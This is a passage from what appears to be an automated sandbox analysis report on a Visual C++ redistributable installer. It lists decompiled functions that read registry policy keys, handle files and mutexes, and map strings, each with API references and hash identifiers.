							_t30 =  *_t22 & 0x0000ffff;
							_t24 = 0x76;
							if(_t24 == _t30) {
								L9:
								 *_t21 =  *_t21 | 0x00000002;
							} else {
								_t26 = 0x56;
								if(_t26 == _t30) {
									goto L9;
								} else {
									_t27 = 0x78;
									if(_t27 == _t30) {
										L8:
										 *_t21 =  *_t21 | 0x00000004;
									} else {
										_t28 = 0x58;
										if(_t28 == _t30) {
											goto L8;
										}
									}
								}
							}
							_t22 =  &(_t22[1]);
						} while ( *_t22 != 0);
					}
				}
				if(_t13 != 0) {
					_t13 = E000554EF(_t13);
				}
				if(_v8 != 0) {
					return RegCloseKey(_v8);
				}
				return _t13;
			}













                                                                          0x00023970
                                                                          0x00023973
                                                                          0x0002397d
                                                                          0x000239da
                                                                          0x00023994
                                                                          0x00023994
                                                                          0x00023997
                                                                          0x0002399c
                                                                          0x0002399e
                                                                          0x000239a3
                                                                          0x000239a3
                                                                          0x000239a8
                                                                          0x000239ac
                                                                          0x000239cb
                                                                          0x000239cb
                                                                          0x000239ae
                                                                          0x000239b0
                                                                          0x000239b4
                                                                          0x00000000
                                                                          0x000239b6
                                                                          0x000239b8
                                                                          0x000239bc
                                                                          0x000239c6
                                                                          0x000239c6
                                                                          0x000239be
                                                                          0x000239c0
                                                                          0x000239c4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000239c4
                                                                          0x000239bc
                                                                          0x000239b4
                                                                          0x000239ce
                                                                          0x000239d1
                                                                          0x000239d7
                                                                          0x0002399c
                                                                          0x000239e0
                                                                          0x000239e3
                                                                          0x000239e3
                                                                          0x000239ec
                                                                          0x00000000
                                                                          0x000239f1
                                                                          0x000239fa

                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00023E61,feclient.dll,?,00000000,?,?,?,00014A0C), ref: 000239F1
                                                                            • Part of subcall function 00050F6E: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00050FE4
                                                                            • Part of subcall function 00050F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0005101F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$CloseOpen
                                                                          • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                          • API String ID: 1586453840-3596319545
                                                                          • Opcode ID: 83dabf228dc39b510fda47bbfac9b9c69650f7725749ccb4008fc5d90c364153
                                                                          • Instruction ID: 8bc8469d9a841bea35148cf836e82e0d119dae4a6911b2dcabd9f6873893e378
                                                                          • Opcode Fuzzy Hash: 83dabf228dc39b510fda47bbfac9b9c69650f7725749ccb4008fc5d90c364153
                                                                          • Instruction Fuzzy Hash: FC11E633B4021CBBDB219B94EC43AAFB7B8EB06B41F404067E5019B040D2B59FC0D750
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004E652 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0004E652(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00048D4E(_t33) != 0xffffffff) {
					_t13 =  *0x7b158; // 0x12e75f8
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00048D4E(2);
						if(E00048D4E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00048D4E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00048CBD(_t33);
						 *((char*)( *((intOrPtr*)(0x7b158 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E00043E00(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







                                                                          0x0004e659
                                                                          0x0004e666
                                                                          0x0004e66c
                                                                          0x0004e674
                                                                          0x0004e682
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004e68a
                                                                          0x0004e68a
                                                                          0x0004e68c
                                                                          0x0004e69e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004e6a0
                                                                          0x0004e6b0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004e6b8
                                                                          0x0004e6ba
                                                                          0x0004e6bb
                                                                          0x0004e6d3
                                                                          0x0004e6da
                                                                          0x00000000
                                                                          0x0004e6e8
                                                                          0x00000000
                                                                          0x0004e6e3
                                                                          0x0004e674
                                                                          0x0004e668
                                                                          0x0004e668
                                                                          0x00000000

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,0004E570,?), ref: 0004E6A8
                                                                          • GetLastError.KERNEL32(?,0004E570,?), ref: 0004E6B2
                                                                          • __dosmaperr.LIBCMT ref: 0004E6DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                          • String ID: @Met
                                                                          • API String ID: 2583163307-2381362037
                                                                          • Opcode ID: 0f52379c00474a61fee3c8946569b2553784f41e60d41cb19ae2c8b721904644
                                                                          • Instruction ID: 51f98298b923c67d57a713c19c1449823026ea667fb83b2bed8e44b83cb363b6
                                                                          • Opcode Fuzzy Hash: 0f52379c00474a61fee3c8946569b2553784f41e60d41cb19ae2c8b721904644
                                                                          • Instruction Fuzzy Hash: 53012F72E0129016D2641374DD45B7E67896BB1B74F260539F918DB1D2DF749C80429C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003CF56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 56%
                                                                          			E0003CF56(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t32;
				intOrPtr _t37;
				intOrPtr _t38;

				_t37 = _a4;
				_t38 = 0;
				WaitForSingleObject( *(_t37 + 0xc), 0xffffffff);
				_t31 = _a8;
				_t30 = _a12;
				 *_t31 =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x10)) + 0x424));
				 *_t30 = 0;
				 *_a16 = 0;
				if( *_t31 != 0) {
					_t32 = E000138D4( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x10)) + 0x42c)), 1);
					 *_t30 = _t32;
					if(_t32 != 0) {
						E0003F0F0(_t32,  *((intOrPtr*)(_t37 + 0x10)) + 0x430,  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x10)) + 0x42c)));
						 *_a16 =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x10)) + 0x42c));
					} else {
						_t38 = 0x8007000e;
						E000137D3(_t23, "NetFxChainer.cpp", 0x9b, 0x8007000e);
						_push("Failed to allocate memory for message data");
						_push(0x8007000e);
						E0005012F();
					}
				}
				ReleaseMutex( *(_t37 + 0xc));
				return _t38;
			}








                                                                          0x0003cf5c
                                                                          0x0003cf5f
                                                                          0x0003cf66
                                                                          0x0003cf6f
                                                                          0x0003cf72
                                                                          0x0003cf7b
                                                                          0x0003cf80
                                                                          0x0003cf82
                                                                          0x0003cf86
                                                                          0x0003cf98
                                                                          0x0003cf9a
                                                                          0x0003cf9e
                                                                          0x0003cfd4
                                                                          0x0003cfe8
                                                                          0x0003cfa0
                                                                          0x0003cfa0
                                                                          0x0003cfb0
                                                                          0x0003cfb5
                                                                          0x0003cfba
                                                                          0x0003cfbb
                                                                          0x0003cfc1
                                                                          0x0003cf9e
                                                                          0x0003cfed
                                                                          0x0003cff9

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,0003D1DC,00000000,00000000,00000000,?), ref: 0003CF66
                                                                          • ReleaseMutex.KERNEL32(?,?,0003D1DC,00000000,00000000,00000000,?), ref: 0003CFED
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          Strings
                                                                          • Failed to allocate memory for message data, xrefs: 0003CFB5
                                                                          • NetFxChainer.cpp, xrefs: 0003CFAB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                          • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                          • API String ID: 2993511968-1624333943
                                                                          • Opcode ID: 459dc7b8aeb425fbd8d1f1b8c32c9528cd5571502e07334f90b2a74f93710f56
                                                                          • Instruction ID: 9c6e25f4f16680fccf93964940fb8fe79ede3f5d736d24a520e5044ee006c8d4
                                                                          • Opcode Fuzzy Hash: 459dc7b8aeb425fbd8d1f1b8c32c9528cd5571502e07334f90b2a74f93710f56
                                                                          • Instruction Fuzzy Hash: 8C1182B1300315AFD715DF28D855E9ABBA9FF09720F104275F9159B3A2C771AC10CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001155F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0001155F(short** _a4, intOrPtr _a8, int _a12, int _a16) {
				short** _t15;
				int _t16;
				void* _t17;

				_t15 = _a4;
				_t16 = _a12;
				_t17 = E000121A5(_t15, _a8, _t16);
				if(_t17 < 0) {
					L6:
					return _t17;
				}
				if(_t16 != 0) {
					L4:
					if(LCMapStringW(0x7f, _a16,  *_t15, _t16,  *_t15, _t16) == 0) {
						_t20 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
						_t17 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "strutil.cpp", 0xa51, _t17);
					}
					goto L6;
				}
				_t17 = E00011C57( *_t15, 0x7fffffff,  &_a12);
				if(_t17 < 0) {
					goto L6;
				}
				_t16 = _a12;
				goto L4;
			}






                                                                          0x00011563
                                                                          0x00011568
                                                                          0x00011575
                                                                          0x00011579
                                                                          0x000115dc
                                                                          0x000115e1
                                                                          0x000115e1
                                                                          0x0001157d
                                                                          0x00011598
                                                                          0x000115ab
                                                                          0x000115be
                                                                          0x000115c8
                                                                          0x000115d6
                                                                          0x000115d6
                                                                          0x00000000
                                                                          0x000115ab
                                                                          0x0001158f
                                                                          0x00011593
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00011595
                                                                          0x00000000

                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(0000007F,00000000,00000000,00026EF3,00000000,00026EF3,00000000,00000000,00026EF3,00000000,00000000,00000000,?,00012326,00000000,00000000), ref: 000115A3
                                                                          • GetLastError.KERNEL32(?,00012326,00000000,00000000,00026EF3,00000200,?,0005516B,00000000,00026EF3,00000000,00026EF3,00000000,00000000,00000000), ref: 000115AD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastString
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 3728238275-569070560
                                                                          • Opcode ID: acd7d3e01c50b15489490da1d7f4067d2c2e0b9db361f864ef015ce932a200c4
                                                                          • Instruction ID: d8756cb5e103be087d359e82ecf7ea9a5dc384a076cc0222632d88826e26eca9
                                                                          • Opcode Fuzzy Hash: acd7d3e01c50b15489490da1d7f4067d2c2e0b9db361f864ef015ce932a200c4
                                                                          • Instruction Fuzzy Hash: AA01B533600B29B7DB219E969C44ED77AAAEF85760B010115FF159B151D721DC5087E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004D244 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			E0004D244(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				signed int _t19;
				signed int _t32;
				signed int _t33;
				signed int _t36;

				_t36 = _a4;
				_push(_t32);
				_t15 = E00048D4E(_t36);
				_t33 = _t32 | 0xffffffff;
				if(_t15 != _t33) {
					_push(_a16);
					if(SetFilePointerEx(_t15, _a8, _a12,  &_v12) != 0) {
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x30;
							 *( *((intOrPtr*)(0x7b158 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0x7b158 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
						}
					} else {
						E00043E00(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E00043E36())) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}










                                                                          0x0004d24c
                                                                          0x0004d24f
                                                                          0x0004d251
                                                                          0x0004d256
                                                                          0x0004d25c
                                                                          0x0004d26f
                                                                          0x0004d285
                                                                          0x0004d2a0
                                                                          0x00000000
                                                                          0x0004d2a2
                                                                          0x0004d2a2
                                                                          0x0004d2ad
                                                                          0x0004d2b7
                                                                          0x0004d2b7
                                                                          0x0004d287
                                                                          0x0004d28e
                                                                          0x00000000
                                                                          0x0004d293
                                                                          0x0004d25e
                                                                          0x0004d263
                                                                          0x0004d269
                                                                          0x0004d269
                                                                          0x0004d26b
                                                                          0x0004d2c1

                                                                          APIs
                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,0004D2D8,?,00000000,00000002,00000000), ref: 0004D27D
                                                                          • GetLastError.KERNEL32(?,0004D2D8,?,00000000,00000002,00000000,?,0004D0F0,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0004D287
                                                                          • __dosmaperr.LIBCMT ref: 0004D28E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                          • String ID: @Met
                                                                          • API String ID: 2336955059-2381362037
                                                                          • Opcode ID: 6cd8df9da9805c7a0320933d962dfe6bc71e705e98a8a252b1c44a943d9bcdfe
                                                                          • Instruction ID: 0066ea021a80cb4497b28ea17766c020af072db1fe9118c8e01c6df671e118c6
                                                                          • Opcode Fuzzy Hash: 6cd8df9da9805c7a0320933d962dfe6bc71e705e98a8a252b1c44a943d9bcdfe
                                                                          • Instruction Fuzzy Hash: 3A014C72B14214AFCB159FE9DC058AF3B69EB85330B24025AF8119B1D1EAB0ED418794
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002FC51 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • userForApplication.cpp, xrefs: 0002FC84
                                                                          • Failed to allocate new BootstrapperuserForApplication object., xrefs: 0002FC8E
                                                                          • Failed to QI for IBootstrapperuser from BootstrapperuserForApplication object., xrefs: 0002FCB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: userForApplication.cpp$Failed to QI for IBootstrapperuser from BootstrapperuserForApplication object.$Failed to allocate new BootstrapperuserForApplication object.
                                                                          • API String ID: 0-1509993410
                                                                          • Opcode ID: 8e1b0356c8f9eb303bfef35ed73ae8316b290ae82db0bfef20cb8e7697f898b6
                                                                          • Instruction ID: 3a35fb3fcac91b33945d1aa076ee0afe4e06ead966725b4c3ac6111a14a96d2d
                                                                          • Opcode Fuzzy Hash: 8e1b0356c8f9eb303bfef35ed73ae8316b290ae82db0bfef20cb8e7697f898b6
                                                                          • Instruction Fuzzy Hash: 83F026362446277B87122615EC02DAF776DCF417A07200036FD05AA291EA6089408565
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000133D7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000133D7(WCHAR** _a4, struct HINSTANCE__* _a8) {
				long _t6;
				WCHAR** _t10;
				long _t11;
				void* _t12;

				_t10 = _a4;
				_t11 = 0x104;
				while(1) {
					_t12 = E00011EDE(_t10, _t11);
					if(_t12 < 0) {
						break;
					}
					_t6 = GetModuleFileNameW(_a8,  *_t10, _t11);
					if(_t6 == 0) {
						_t15 =  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
						_t12 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "pathutil.cpp", 0x1d4, _t12);
					} else {
						if(_t6 != _t11) {
							_t12 = 0;
						} else {
							_t3 = _t6 + 1; // 0x1
							_t11 = _t3;
							continue;
						}
					}
					break;
				}
				return _t12;
			}







                                                                          0x000133db
                                                                          0x000133e0
                                                                          0x000133e5
                                                                          0x000133ec
                                                                          0x000133f0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000133f8
                                                                          0x00013400
                                                                          0x00013420
                                                                          0x0001342a
                                                                          0x00013438
                                                                          0x00013402
                                                                          0x00013404
                                                                          0x0001340b
                                                                          0x00013406
                                                                          0x00013406
                                                                          0x00013406
                                                                          0x00000000
                                                                          0x00013406
                                                                          0x00013404
                                                                          0x00000000
                                                                          0x00013400
                                                                          0x00013443

                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000110DD,?,00000000), ref: 000133F8
                                                                          • GetLastError.KERNEL32(?,?,?,000110DD,?,00000000), ref: 0001340F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastModuleName
                                                                          • String ID: @Met$pathutil.cpp
                                                                          • API String ID: 2776309574-364970561
                                                                          • Opcode ID: 733bbe6f7e4da303e3cd70438090620b4b52fe5bbad54442c2cdbab72ef53952
                                                                          • Instruction ID: b0e38abfdba81d2dcbb29f410455784513bb81bb860b2b283d36003b1300a440
                                                                          • Opcode Fuzzy Hash: 733bbe6f7e4da303e3cd70438090620b4b52fe5bbad54442c2cdbab72ef53952
                                                                          • Instruction Fuzzy Hash: 74F0F633B047306BE7325AAA5C48ED7BADDEF45760B024121FE05EB150D721ED4082F0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000548CB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E000548CB(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				char* _t8;
				void* _t16;
				intOrPtr* _t17;
				void* _t19;
				intOrPtr _t20;

				_t17 = _a8;
				_t8 =  &_v12;
				_t20 = 0;
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				__imp__GetFileSizeEx(_a4, _t8, _t16, _t19, __ecx, __ecx);
				if(_t8 != 0) {
					 *_t17 = _v12;
					 *((intOrPtr*)(_t17 + 4)) = _v8;
				} else {
					_t24 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
					_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "fileutil.cpp", 0x246, _t20);
				}
				return _t20;
			}










                                                                          0x000548d2
                                                                          0x000548d5
                                                                          0x000548dc
                                                                          0x000548de
                                                                          0x000548e0
                                                                          0x000548e3
                                                                          0x000548eb
                                                                          0x00054920
                                                                          0x00054925
                                                                          0x000548ed
                                                                          0x000548fe
                                                                          0x00054908
                                                                          0x00054916
                                                                          0x00054916
                                                                          0x0005492f

                                                                          APIs
                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,746AFB40,?,?,?,0001B919,?,?,?,00000000,00000000), ref: 000548E3
                                                                          • GetLastError.KERNEL32(?,?,?,0001B919,?,?,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000548ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastSize
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 464720113-2299628883
                                                                          • Opcode ID: 1cc48bba3697da5d29c2256fb209dbed44d692fb329cde763b2c13dcdd319c25
                                                                          • Instruction ID: a05bc5d3c05885bc47a92a33fcec526b8c0681e1cc94477ee08819c82208b7fc
                                                                          • Opcode Fuzzy Hash: 1cc48bba3697da5d29c2256fb209dbed44d692fb329cde763b2c13dcdd319c25
                                                                          • Instruction Fuzzy Hash: 1EF0AFB2A04326ABA7109F9988059ABFBECEF04751B01421AFC09E7240D371AD10CBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00046A76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E00046A76(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E000419B7(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
